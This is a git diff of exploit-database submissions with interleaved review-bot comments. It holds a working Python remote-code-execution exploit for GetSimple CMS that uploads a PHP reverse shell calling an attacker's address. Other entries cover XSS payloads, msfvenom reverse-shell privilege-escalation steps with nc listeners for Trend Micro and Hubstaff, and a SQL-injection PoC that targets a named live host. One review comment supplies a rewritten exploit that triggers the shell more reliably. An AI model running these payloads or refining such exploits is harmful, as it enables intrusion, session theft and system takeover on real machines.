@@ -0,0 +1,140 @@ +# Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE) +# Data: 18/5/2023 +# Exploit Author : Youssef Muhammad +# Vendor: Get-simple +# Software Link: +# Version app: 3.3.16 +# Tested on: linux +# CVE: CVE-2022-41544 + +import sys +import hashlib +import re +import requests +from xml.etree import ElementTree +from threading import Thread +import telnetlib + +purple = "\033[0;35m" +reset = "\033[0m" +yellow = "\033[93m" +blue = "\033[34m" +red = "\033[0;31m" + +def print_the_banner(): + print(purple + ''' + CCC V V EEEE 22 000 22 22 4 4 11 5555 4 4 4 4 +C V V E 2 2 0 00 2 2 2 2 4 4 111 5 4 4 4 4 +C V V EEE --- 2 0 0 0 2 2 --- 4444 11 555 4444 4444 +C V V E 2 00 0 2 2 4 11 5 4 4 + CCC V EEEE 2222 000 2222 2222 4 11l1 555 4 4 + '''+ reset) + +def get_version(target, path): + r = requests.get(f"http://{target}{path}admin/index.php") + match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text) + if match: + version = match.group(1) + if version <= "3.3.16": + print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544") + else: + print ("This is not vulnrable to this CVE") + return version + return None + +def api_leak(target, path): + r = requests.get(f"http://{target}{path}data/other/authorization.xml") + if r.ok: + tree = ElementTree.fromstring(r.content) + apikey = tree[0].text + print(f"[+] apikey obtained {apikey}") + return apikey + return None + +def set_cookies(username, version, apikey): + cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest() + cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest() + cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}" + headers = { + 'Content-Type':'application/x-www-form-urlencoded', + 'Cookie': cookies + } + return headers + +def get_csrf_token(target, path, headers): + r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers) + m = re.search('nonce" type="hidden" 
value="(.*)"', r.text) + if m: + print("[+] csrf token obtained") + return m.group(1) + return None + +def upload_shell(target, path, headers, nonce, shell_content): + upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true" + payload = { + 'content': shell_content, + 'edited_file': '../shell.php', + 'nonce': nonce, + 'submitsave': 1 + } + try: + response = requests.post(upload_url, headers=headers, data=payload) + if response.status_code == 200: + print("[+] Shell uploaded successfully!") + else: + print("(-) Shell upload failed!") + except requests.exceptions.RequestException as e: + print("(-) An error occurred while uploading the shell:", e) +def shell_trigger(target, path): + url = f"http://{target}{path}/shell.php" + try: + response = requests.get(url) + if response.status_code == 200: + print("[+] Webshell trigged successfully!") + else: + print("(-) Failed to visit the page!") + except requests.exceptions.RequestException as e: + print("(-) An error occurred while visiting the page:", e) + +def main(): + if len(sys.argv) != 5: + print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>") + return + + target = sys.argv[1] + path = sys.argv[2] + if not path.endswith('/'): + path += '/' + + ip, port = sys.argv[3].split(':') + username = sys.argv[4] + shell_content = f"""<?php + $ip = '{ip}'; + $port = {port}; + $sock = fsockopen($ip, $port); + $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes); + """ + + version = get_version(target, path) + if not version: + print("(-) could not get version") + return + + apikey = api_leak(target, path) + if not apikey: + print("(-) could not get apikey") + return + + headers = set_cookies(username, version, apikey) + + nonce = get_csrf_token(target, path, headers) + if not nonce: + print("(-) could not get nonce") + return + + upload_shell(target, path, headers, nonce, shell_content) + shell_trigger(target, path) + +if __name__ == '__main__': + print_the_banner() 
+ main() \ No newline at end of file diff --git a/exploits/php/webapps/51476.txt b/exploits/php/webapps/51476.txt new file mode 100644 index 000000000..2589ae124 --- /dev/null +++ b/exploits/php/webapps/51476.txt 
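Review bot: `get_version` compares version strings lexicographically: `if version <= "3.3.16"` is a `str` comparison, so `"3.3.9"` (vulnerable) sorts above `"3.3.16"` and is announced as not vulnerable, yet the function still returns the version and `main` carries on with the exploit either way. Compare numerically and make the negative verdict actually stop the run, since `main` only bails on a missing version. `shell_trigger` then issues a plain `requests.get(url)` that blocks for as long as the spawned `/bin/sh` keeps the request open, and `upload_shell` treats any `200` as success although the theme editor re-renders its form with a 200 on failure; the unused `Thread` and `telnetlib` imports suggest the trigger was meant to run in a background thread with a timeout. The `edited_file: '../shell.php'` traversal in `upload_shell` is presumably the actual CVE-2022-41544 weakness and deserves one sentence in the header, which currently has an empty `# Software Link:`.
```python
def get_version(target, path):
    r = requests.get(f"http://{target}{path}admin/index.php", timeout=10)
    match = re.search(r"jquery.getsimple.js\?v=(.*)\"", r.text)
    if not match:
        return None
    version = match.group(1)
    # Numeric compare: a plain str compare puts "3.3.9" above "3.3.16".
    try:
        vulnerable = tuple(int(p) for p in version.split(".")) <= (3, 3, 16)
    except ValueError:
        vulnerable = False
    if not vulnerable:
        print("This is not vulnrable to this CVE")
        return None
    print(red + f"[+] the version {version} is vulnrable to CVE-2022-41544")
    return version

# … unchanged: api_leak, set_cookies, get_csrf_token, upload_shell …

def shell_trigger(target, path):
    # The GET never returns while /bin/sh holds the socket; fire it in the
    # background with a short timeout so main() can finish.
    def _hit():
        try:
            requests.get(f"http://{target}{path}shell.php", timeout=5)
        except requests.exceptions.ReadTimeout:
            pass  # expected: the shell keeps the connection open
    Thread(target=_hit, daemon=True).start()
    print("[+] Webshell triggered; check your listener")
```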
@@ -0,0 +1,64 @@ +# Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) +# Date: 2023-04-15 +# Exploit Author: Rahad Chowdhury +# Vendor Homepage: https://www.bludit.com/ +# Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1 +# Version: 3.14.1 +# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 +# CVE: CVE-2023-31698 + +SVG Payload +------------- +<?xml version="1.0" standalone="no"?> +<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " +http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> +<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> +<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400 +"/> +<script type="text/javascript"> +alert(document.domain); +</script> +</svg> + +save this SVG file xss.svg + +Steps to Reproduce: + +1. At first login your admin panel. +2. then go to settings and click the logo section. +3. Now upload xss.svg file so your request data will be + +POST /bludit/admin/ajax/logo-upload HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) +Gecko/20100101 Firefox/112.0 +Content-Type: multipart/form-data; +boundary=---------------------------15560729415644048492005010998 +Referer: http://127.0.0.1/bludit/admin/settings +Cookie: BLUDITREMEMBERUSERNAME=admin; +BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985; +BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i +Content-Length: 651 + +-----------------------------15560729415644048492005010998 +Content-Disposition: form-data; name="tokenCSRF" + +626c201693546f472cdfc11bed0938aab8c6e480 +-----------------------------15560729415644048492005010998 +Content-Disposition: form-data; name="inputFile"; filename="xss.svg" +Content-Type: image/svg+xml + +<?xml version="1.0" standalone="no"?> +<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " +http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> +<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> +<polygon id="triangle" 
points="0,0 0,50 50,0" fill="#009900" stroke="#004400 +"/> +<script type="text/javascript"> +alert(document.domain); +</script> +</svg> + +-----------------------------15560729415644048492005010998-- + +4. Now open the logo image link that you upload. You will see XSS pop up. \ No newline at end of file diff --git a/exploits/php/webapps/51477.txt b/exploits/php/webapps/51477.txt new file mode 100644 index 000000000..65f9de02b --- /dev/null +++ b/exploits/php/webapps/51477.txt @@ -0,0 +1,17 @@ +# Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated) +# Date: 2023-04-17 +# Exploit Author: Rahad Chowdhury +# Vendor Homepage: http://churchcrm.io/ +# Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4 +# Version: 4.5.4 +# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 +# CVE: CVE-2023-31699 + +Steps to Reproduce: + +1. At first login your admin panel. +2. Then click the "Admin" menu and click "CSV Import '' and you will get +the CSV file uploader option. +3. now insert xss payload in jpg file using exiftool or from image +properties and then upload the jpg file. +4. you will see XSS pop up. \ No newline at end of file diff --git a/exploits/php/webapps/51478.txt b/exploits/php/webapps/51478.txt new file mode 100644 index 000000000..d487ef58d --- /dev/null +++ b/exploits/php/webapps/51478.txt 
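Review bot: Step 4 shows the script runs only when the uploaded SVG is opened directly by its URL, not when the browser renders it as the site logo through an `<img>` tag, and the uploader is already an administrator, so the advisory should say that a victim must be lured to the raw file URL (the upload path is not shown) and what the attacker gains beyond the admin account they already hold, e.g. another admin's session via `document.cookie`. The fix to recommend is to reject SVG for the logo or to serve uploads with `Content-Disposition: attachment` and a restrictive CSP, and to strip `<script>` and event-handler attributes from SVGs that must be accepted.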
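Review bot: Step 3 (`insert xss payload in jpg file using exiftool or from image properties`) does not say which metadata tag carries the payload, which page reflects it, or what the CSV importer does with a JPEG, so the finding cannot be reproduced or fixed from this text. Name the tag (whether it is `Comment`, `ImageDescription` or the file name itself), quote the exact request and the response fragment where the string is rendered unescaped, and state whether the sink is the import preview or a later view. Since the payload is delivered by an authenticated admin to a page that same admin views, the advisory should also say what a lower-privileged user can reach; otherwise the impact is self-XSS.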
@@ -0,0 +1,27 @@ +# Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting) +# Date: 2023-02-02 +# Exploit Author: Andrea Intilangelo +# Vendor Homepage: https://civicrm.org +# Software Link: https://civicrm.org/download +# Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier) +# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70) +# CVE: CVE-2023-25440 +Vendor Security Advisory: CIVI-SA-2023-05 + + +Description: + +A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows attacker to execute arbitrary web +scripts or HTML. + +Injecting persistent javascript code inside the "Add Contact" function while creating a contact, in first/second name +field, it will be triggered once page gets loaded. + + +Steps to reproduce: + +- Quick Add contact to CiviCRM, +- Insert a payload PoC inside the field(s) +- Click on 'Add contact'. + +If a user visits the dashboard, as well as "Recently added" box, the javascript code will be rendered. \ No newline at end of file diff --git a/exploits/ruby/webapps/51446.txt b/exploits/ruby/webapps/51446.txt new file mode 100644 index 000000000..f936d77a5 --- /dev/null +++ b/exploits/ruby/webapps/51446.txt 
@@ -0,0 +1,55 @@ +# Exploit Title: Authenticated Persistent XSS in Cameleon CMS 2.7.4 +# Google Dork: intext:"Camaleon CMS is a free and open-source tool and +a fexible content management system (CMS) based on Ruby on Rails" +# Date: 2023-10-05 +# Exploit Author: Yasin Gergin +# Vendor Homepage: http://camaleon.tuzitio.com +# Software Link: https://github.com/owen2345/camaleon-cms +# Version: 2.7.4 +# Tested on: Linux kali 6.1.0-kali7-amd64 +# CVE : - + +--- Description --- + +http://127.0.0.1:3000/admin/login - Login as a Admin + +Under Post tab click on "Create New" + +While creating the post set Title as "><svg/onmouseover=alert(document.cookie)> + +http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent +to this url + +-- POST DATA -- + +POST /admin/post_type/2/posts HTTP/1.1 + +Host: 127.0.0.1:3000 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 +Firefox/102.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new +Content-Type: application/x-www-form-urlencoded +Content-Length: 666 +Origin: http://127.0.0.1:3000 +Connection: keep-alive +Cookie: +_my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D; +auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1; +phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin 
+Sec-Fetch-User: ?1 + + +authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D= + +-- POST DATA -- + +Then view the post you've created by clicking on "View Page" move your +mouse cursor onto post title. XSS will popup. \ No newline at end of file diff --git a/exploits/windows/local/51453.txt b/exploits/windows/local/51453.txt new file mode 100644 index 000000000..561417d2b --- /dev/null +++ b/exploits/windows/local/51453.txt 
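Review bot: The `# Date: 2023-10-05` header is later than the 24 May 2023 commit that adds this file, so it is either a day/month swap (`2023-05-10`) or a typo and should be corrected, since the date feeds the disclosure timeline. The `Cookie:` line of the captured request also carries `phpMyAdmin=…` and `pma_lang=en`, which belong to an unrelated application on the tester's host and can be dropped from the PoC. The title `Authenticated Persistent XSS in Cameleon CMS 2.7.4` misspells the product; the software link and vendor page say `Camaleon`.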
@@ -0,0 +1,91 @@ +# Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE +# Date: 2023/05/04 +# Exploit Author: msd0pe +# Vendor Homepage: https://www.trendmicro.com +# My Github: https://github.com/msd0pe-1 + + +Trend Micro OfficeScan Client: +Versions =< 10.0 contains wrong ACL rights on the OfficeScan client folder which allows attackers to escalate privileges to the system level through the services. This vulnerabily does not need any privileges access. + +[1] Verify the folder rights: + > icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client" + + C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F) + NT SERVICE\TrustedInstaller:(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(F) + NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F) + BUILTIN\Administrators:(F) + BUILTIN\Administrators:(OI)(CI)(IO)(F) + BUILTIN\Users:(F) + BUILTIN\Users:(OI)(CI)(IO)(F) + CREATOR OWNER:(OI)(CI)(IO)(F) + APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX) + APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO) + +[2] Get informations about the services: + > sc qc tmlisten + + [SC] QueryServiceConfig SUCCESS + + SERVICE_NAME: tmlisten + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe" + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : OfficeScan NT Listener + DEPENDENCIES : Netman + : WinMgmt + SERVICE_START_NAME : LocalSystem + +OR + + > sc qc ntrtscan + + SERVICE_NAME: ntrtscan + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe" + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : OfficeScan NT RealTime Scan + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +[3] Generate a reverse shell: + > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe + + OR + + 
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe + +[4] Upload the reverse shell to C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe + +[5] Start listener + > nc -lvp 4444 + +[6] Reboot the service/server + > sc stop tmlisten + > sc start tmlisten + + OR + + > sc stop ntrtscan + > sc start ntrtscan + + OR + + > shutdown /r + +[7] Enjoy ! + 192.168.1.102: inverse host lookup failed: Unknown host + connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 + Microsoft Windows [Version 10.0.19045.2130] + (c) Microsoft Corporation. All rights reserved. + + C:\Windows\system32>whoami + + nt authority\system \ No newline at end of file diff --git a/exploits/windows/local/51461.txt b/exploits/windows/local/51461.txt new file mode 100644 index 000000000..5de9dbfd9 --- /dev/null +++ b/exploits/windows/local/51461.txt 
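Review bot: The claim `This vulnerabily does not need any privileges access` conflicts with step [6]: `sc stop tmlisten` / `sc start tmlisten` require SERVICE_STOP and SERVICE_START on the service object, which standard users do not hold by default unless the service DACL is also weak, and no `sc sdshow tmlisten` output is given. The unprivileged route is the `shutdown /r` alternative (standard users normally hold the shutdown right on workstations), so the steps should make that the primary path or show the service DACL. The `icacls` output does support the file-side claim (`BUILTIN\Users:(F)` with `(OI)(CI)(IO)`), but overwriting `tmlisten.exe` disables the agent, so recommend copying the original aside first and note that any agent self-protection, if present on this build, would block the swap. The advisory also lacks a vendor reference or CVE for `Versions =< 10.0`.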
@@ -0,0 +1,48 @@
+*#Exploit Title:* Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
+*#Date:* 14/05/2023
+*#Exploit Author:* Ahsan Azad
+*#Vendor Homepage:* https://hubstaff.com/
+*#Software Link:* https://app.hubstaff.com/download
+*#Version:* 1.6.13, 1.6.14
+*#Tested On:* 64-bit operating system, x64-based processor
+
+*Description*
+Hubstaff is an employee work tracker with screenshots, timesheets, billing,
+in-depth reports, and more.
+
+During testing. It was found that the system32 subdirectory was missing a
+DLL library with the name *wow64log.dll* that had been required by the
+hubstaff's setup file during installation. Hence, using Metasploit's
+msfvenom to create a new wow64log.dll file, Tester was able to get a
+reverse shell locally.
+
+
+*Exploit*
+1- Generate a dll file with the name wow64log.dll using the command:
+
+*msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll
+-o wow64log.dll*
+
+2- Place the newly generated DLL to the *system32 *directory.
+3- Start a listener on attacker's console using:
+
+*nc -lnvp <port_used_while_generating_DLL>*
+
+4- Launch the exe.
+
+Reverse shell will be receive as:
+
+
+*C:\Windows>*
+
+
+
+*Attachments (For the understanding of verification team)*
+1.png - Showing the wow64.dll was not found by the exe. [image: 1.png]
+
+2.png - Showing how tester was able to generate a new dll using msfvenom on
+port 1337.
+[image: 2.png]
+
+3.png - Showing a reverse connection received on the attacker's console
+at C:\Windows> by launching the exe.[image: 3.png]
\ No newline at end of file
diff --git a/exploits/windows/local/51479.txt b/exploits/windows/local/51479.txt
new file mode 100644
index 000000000..a51317cad
--- /dev/null
+++ b/exploits/windows/local/51479.txt
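Review bot: Step 2 places the DLL in the `system32` directory, but the write-up never states which account performs that write; on a default Windows install that directory is not writable by standard users, so as written no privilege boundary is shown to be crossed and the precondition (or the misconfiguration that makes the directory writable) needs to be documented. As far as I know the `wow64log.dll` lookup comes from the WoW64 layer for 32-bit processes in general rather than from the application, so the Hubstaff-specific element of the finding should be stated explicitly. The attachments section refers to `wow64.dll` where the rest of the text says `wow64log.dll`; one name should be used throughout.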
@@ -0,0 +1,53 @@
+# Exploit Title :MobileTrans 4.0.11 - Weak Service Privilege Escalation
+# Date: 20 May 2023
+# Exploit Author: Thurein Soe
+# Vendor Homepage: https://mobiletrans.wondershare.com/
+# Software Link:
+https://mega.nz/file/0Et0ybRS#l69LRlvwrwmqDfPGKl_HaJ5LmbeKJu_wH0xYKD8nSVg
+# Version: MobileTrans version 4.0.11
+# Tested on: Window 10 (Version 10.0.19045.2965)
+# CVE : CVE-2023-31748
+
+
+
+Vulnerability Description:
+
+MobileTrans is World 1 mobile-to-mobile file transfer
+application.MobileTrans version 4.0.11 was being suffered a weak service
+permission vulnerability that allows a normal window user to elevate to
+local admin. The "ElevationService" service name was installed, while the
+MobileTrans version 4.0.11 was installed in the window operating system.
+The service "ElevationService" allows the local user to elevate to the
+local admin as The "ElevationService" run with system privileges.
+Effectively, the local user is able to elevate to local admin upon
+successfully modifying the service or replacing the affected executable.
+
+C:\Users\HninKayThayar\Desktop>sc qc ElevationService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ElevationService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files
+(x86)\Wondershare\MobileTrans\ElevationService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Wondershare Driver Install Service help
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\HninKayThayar\Desktop>cacls "C:\Program Files
+(x86)\Wondershare\MobileTrans\ElevationService.exe"
+C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
+ Everyone:(ID)F
+ NT
+AUTHORITY\SYSTEM:(ID)F
+
+BUILTIN\Administrators:(ID)F
+
+BUILTIN\Users:(ID)R
+
+APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
+
+APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
\ No newline at end of file
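Review bot: The description says the local user elevates to "local admin", but `SERVICE_START_NAME : LocalSystem` in the `sc qc` output means the service runs as SYSTEM, not as a local administrator; the impact statement should match the evidence shown. The text also claims elevation "upon successfully modifying the service", yet only the file ACL from `cacls` is shown (`Everyone:(ID)F`) and not the service object's own permissions, so that clause is unsupported and should be dropped or backed by output. The `(ID)` flag on the `Everyone` entry marks an inherited ACE, which suggests the permissive ACL originates on the install directory rather than on the file alone — worth stating, since the remediation is then to correct the parent folder's ACL and not just the executable's.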
diff --git a/exploits/windows/webapps/51466.txt b/exploits/windows/webapps/51466.txt
new file mode 100644
index 000000000..abd027186
--- /dev/null
+++ b/exploits/windows/webapps/51466.txt
@@ -0,0 +1,23 @@
+# Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
+# Date: 16/05/2023
+# Exploit Author: Sahil Ojha
+# Vendor Homepage: https://www.escanav.com
+# Software Link: https://cl.escanav.com/ewconsole.dll
+# Version: 14.0.1400.2281
+# Tested on: Windows
+# CVE : CVE-2023-31702
+
+*Step of Reproduction/Proof of concept(POC)*
+
+1. Login into the escan management console with a valid username and
+password as root user.
+2. Navigate to URL:
+https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=4176
+3. Inject the payload into the UsrId parameter to confirm the SQL
+injection as shown below:
+https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR
+DELAY '0:0:5'--&cnt=4176
+4. The time delay of 5 seconds confirmed that "UsrId" parameter was
+vulnerable to SQL Injection. Furthermore, it was also possible to dump
+all the databases and inject OS shell directly into the MS SQL Server
+using SQLMap tool.
\ No newline at end of file
diff --git a/exploits/windows/webapps/51467.txt b/exploits/windows/webapps/51467.txt
new file mode 100644
index 000000000..8eba64c60
--- /dev/null
+++ b/exploits/windows/webapps/51467.txt
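Review bot: The proof-of-concept URLs in steps 2 and 3 point at a concrete hostname (`https://cl.escanav.com/...`) instead of a placeholder such as `https://<target>/ewconsole/ewconsole.dll/...`; a published PoC should not name a live host that readers do not own, and the same applies to the URLs in the 51467.txt hunk that follows. The `# Software Link` field carries that same console URL rather than a download location, which looks like a paste error. The closing claim in step 4 about dumping all databases and obtaining an OS shell is not supported by any shown output and should be qualified as such.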
@@ -0,0 +1,19 @@
+# Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting
+# Date: 2023-05-16
+# Exploit Author: Sahil Ojha
+# Vendor Homepage: https://www.escanav.com
+# Software Link: https://cl.escanav.com/ewconsole.dll
+# Version: 14.0.1400.2281
+# Tested on: Windows
+# CVE : CVE-2023-31703
+
+*Step of Reproduction/ Proof of Concept(POC)*
+
+1. Login into the eScan Management Console with a valid user credential.
+2. Navigate to URL:
+https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=
+3. Now, Inject the Cross Site Scripting Payload in "from" parameter as
+shown below and a valid XSS pop up appeared.
+https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=
+4. By exploiting this vulnerability, any arbitrary attacker could have
+stolen an admin user session cookie to perform account takeover.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f0fd6053a..9d9bbe31f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -3802,6 +3802,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 27892,exploits/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting",2006-05-17,"Jaime Blasco",remote,hardware,,2006-05-17,2013-08-27,1,CVE-2006-2490;OSVDB-25621,,,,,https://www.securityfocus.com/bid/18022/info
 20892,exploits/hardware/remote/20892.txt,"Olicom XLT-F XL 80 IM V5.5BL2 - Undocumented Community String",2001-03-25,"Jacek Lipkowski",remote,hardware,,2001-03-25,2012-08-28,1,CVE-2001-0380;OSVDB-8817,,,,,https://www.securityfocus.com/bid/2802/info
 50996,exploits/hardware/remote/50996.txt,"Omnia MPX 1.5.0+r1 - Path Traversal",2022-08-01,"Momen Eldawakhly",remote,hardware,,2022-08-01,2022-08-01,0,,,,,,
+51444,exploits/hardware/remote/51444.txt,"Optoma 1080PSTX Firmware C02 - Authentication Bypass",2023-05-23,"Anthony Cole",remote,hardware,,2023-05-23,2023-05-23,0,CVE-2023-27823,,,,,
 8096,exploits/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting",2009-02-23,"Rizki Wicaksono",remote,hardware,,2009-02-22,,1,OSVDB-52370,,,,,
 21699,exploits/hardware/remote/21699.txt,"Orinoco OEM Residential Gateway - SNMP Community String Remote Configuration",2002-08-09,"Foundstone Inc.",remote,hardware,,2002-08-09,2012-10-03,1,CVE-2002-0812;OSVDB-11315,,,,,https://www.securityfocus.com/bid/5436/info
 51306,exploits/hardware/remote/51306.txt,"Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection",2023-04-06,LiquidWorm,remote,hardware,,2023-04-06,2023-04-06,0,,,,,,
@@ -3860,6 +3861,12 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",remote,hardware,,2016-03-03,2016-03-03,0,CVE-2016-2278,,,,,https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01
 50987,exploits/hardware/remote/50987.ps1,"Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution",2022-07-29,LiquidWorm,remote,hardware,,2022-07-29,2022-07-29,0,,,,,,
 51320,exploits/hardware/remote/51320.txt,"Schneider Electric v1.0 - Directory traversal & Broken Authentication",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-08,0,,,,,,
+51455,exploits/hardware/remote/51455.py,"Screen SFT DAB 600/C - Authentication Bypass Account Creation",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
+51458,exploits/hardware/remote/51458.py,"Screen SFT DAB 600/C - Authentication Bypass Admin Password Change",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
+51457,exploits/hardware/remote/51457.py,"Screen SFT DAB 600/C - Authentication Bypass Erase Account",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
+51456,exploits/hardware/remote/51456.py,"Screen SFT DAB 600/C - Authentication Bypass Password Change",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
+51459,exploits/hardware/remote/51459.py,"Screen SFT DAB 600/C - Authentication Bypass Reset Board Config",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
